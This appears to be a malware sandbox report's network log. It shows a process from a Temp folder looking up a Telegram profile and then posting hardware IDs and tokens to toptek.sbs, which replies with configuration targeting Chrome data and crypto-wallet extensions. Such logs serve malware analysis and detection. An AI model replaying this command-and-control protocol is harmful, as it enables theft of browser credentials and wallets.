                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:21.747284889 CET49835443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:21.747529030 CET49835443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:21.747545958 CET4434983594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:23.153191090 CET4434983594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:23.153367996 CET49835443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:23.153698921 CET49835443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:23.153709888 CET4434983594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:23.155334949 CET49835443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:23.155340910 CET4434983594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:23.155411005 CET49835443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:23.155422926 CET4434983594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:23.155491114 CET49835443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:23.155505896 CET49835443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:23.155524015 CET4434983594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:23.155558109 CET4434983594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:23.155738115 CET49835443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:23.155886889 CET4434983594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:23.156021118 CET49835443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:23.156045914 CET49835443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:23.156054020 CET4434983594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:23.156075001 CET4434983594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:24.917690039 CET4434983594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:24.917767048 CET49835443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:24.917783976 CET4434983594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:24.917821884 CET49835443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:24.917865992 CET4434983594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:24.917924881 CET49835443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:24.918009043 CET49835443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:24.918021917 CET4434983594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:24.956392050 CET49841443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:24.956478119 CET4434984194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:24.956571102 CET49841443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:24.956816912 CET49841443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:24.956867933 CET4434984194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:26.382397890 CET4434984194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:26.382587910 CET49841443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:26.383008957 CET49841443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:26.383059978 CET4434984194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:26.384936094 CET49841443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:26.384955883 CET4434984194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:27.650969028 CET4434984194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:27.651117086 CET49841443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:27.651176929 CET4434984194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:27.651216030 CET4434984194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:27.651231050 CET49841443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:27.651267052 CET49841443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:27.651302099 CET49841443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:27.651351929 CET4434984194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:27.652477980 CET49852443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:27.652559996 CET4434985294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:27.652652979 CET49852443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:27.652837992 CET49852443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:27.652864933 CET4434985294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:29.065268040 CET4434985294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:29.065418005 CET49852443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:29.065859079 CET49852443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:29.065912008 CET4434985294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:29.067385912 CET49852443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:29.067404032 CET4434985294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:29.950208902 CET4434985294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:29.950364113 CET4434985294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:29.950421095 CET49852443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:29.950422049 CET49852443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:29.950544119 CET49852443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:29.950582027 CET4434985294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:03.501826048 CET6285053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:03.718823910 CET53628501.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:19.449812889 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:30.091262102 CET5226453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:30.228945017 CET53522641.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.192471027 CET5938553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.508272886 CET53593851.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.063973904 CET53520181.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.084806919 CET6421053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.085011959 CET6039053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.157601118 CET53624931.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.221848965 CET53642101.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.222336054 CET53603901.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:50.954956055 CET53608221.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:51.994051933 CET53621781.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:03.501826048 CET192.168.2.41.1.1.10xeea2Standard query (0)ezaZTimpWHt.ezaZTimpWHtA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:30.091262102 CET192.168.2.41.1.1.10xa0b8Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.192471027 CET192.168.2.41.1.1.10x92b2Standard query (0)toptek.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.084806919 CET192.168.2.41.1.1.10xd7fcStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.085011959 CET192.168.2.41.1.1.10x8a64Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:03.718823910 CET1.1.1.1192.168.2.40xeea2Name error (3)ezaZTimpWHt.ezaZTimpWHtnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:30.228945017 CET1.1.1.1192.168.2.40xa0b8No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:32.508272886 CET1.1.1.1192.168.2.40x92b2No error (0)toptek.sbs94.130.188.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.221848965 CET1.1.1.1192.168.2.40xd7fcNo error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:48.222336054 CET1.1.1.1192.168.2.40x8a64No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                          • t.me
                                                                                                                                                                                                                                                                          • toptek.sbs
                                                                                                                                                                                                                                                                          • www.google.com
                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          0192.168.2.449738149.154.167.994437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:47:31 UTC85OUTGET /k04ael HTTP/1.1
                                                                                                                                                                                                                                                                          Host: t.me
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:47:32 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:31 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          Content-Length: 12296
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: stel_ssid=f99b7526b9c8478abc_16618598629724549006; expires=Mon, 23 Dec 2024 21:47:31 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Cache-control: no-store
                                                                                                                                                                                                                                                                          X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                          2024-12-22 21:47:32 UTC12296INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 30 34 61 65 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          1192.168.2.44973994.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:47:34 UTC230OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:47:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:34 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-22 21:47:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          2192.168.2.44974094.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:47:36 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----CTJEC2VAAAAIE3W47YMG
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 256
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:47:36 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 43 54 4a 45 43 32 56 41 41 41 41 49 45 33 57 34 37 59 4d 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 30 46 35 39 39 34 31 38 33 37 41 32 39 37 34 31 36 34 32 35 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 43 54 4a 45 43 32 56 41 41 41 41 49 45 33 57 34 37 59 4d 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 43 54 4a 45 43 32 56 41 41 41 41 49 45 33 57 34 37 59 4d 47 2d 2d 0d
                                                                                                                                                                                                                                                                          Data Ascii: ------CTJEC2VAAAAIE3W47YMGContent-Disposition: form-data; name="hwid"20F59941837A2974164258-a33c7340-61ca------CTJEC2VAAAAIE3W47YMGContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------CTJEC2VAAAAIE3W47YMG--
                                                                                                                                                                                                                                                                          2024-12-22 21:47:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:37 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-22 21:47:37 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 7c 31 7c 31 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 3a1|1|1|1|a45628d56513102ac81c4cf99122a512|1|1|1|1|0|50000|10


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          3192.168.2.44974194.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:47:38 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----379R1D2DTRQIEU37YU3O
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:47:38 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 33 37 39 52 31 44 32 44 54 52 51 49 45 55 33 37 59 55 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 33 37 39 52 31 44 32 44 54 52 51 49 45 55 33 37 59 55 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 33 37 39 52 31 44 32 44 54 52 51 49 45 55 33 37 59 55 33 4f 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------379R1D2DTRQIEU37YU3OContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------379R1D2DTRQIEU37YU3OContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------379R1D2DTRQIEU37YU3OCont
                                                                                                                                                                                                                                                                          2024-12-22 21:47:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:39 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-22 21:47:39 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                          Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          4192.168.2.44974294.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:47:41 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----N7GVKFKNOP8YUAIWTJEU
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:47:41 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 37 47 56 4b 46 4b 4e 4f 50 38 59 55 41 49 57 54 4a 45 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4e 37 47 56 4b 46 4b 4e 4f 50 38 59 55 41 49 57 54 4a 45 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4e 37 47 56 4b 46 4b 4e 4f 50 38 59 55 41 49 57 54 4a 45 55 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------N7GVKFKNOP8YUAIWTJEUContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------N7GVKFKNOP8YUAIWTJEUContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------N7GVKFKNOP8YUAIWTJEUCont
                                                                                                                                                                                                                                                                          2024-12-22 21:47:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:41 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-22 21:47:41 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                          Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          5192.168.2.44974394.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:47:43 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----26XT0ZMGV3W4E3EUS2DT
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 332
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
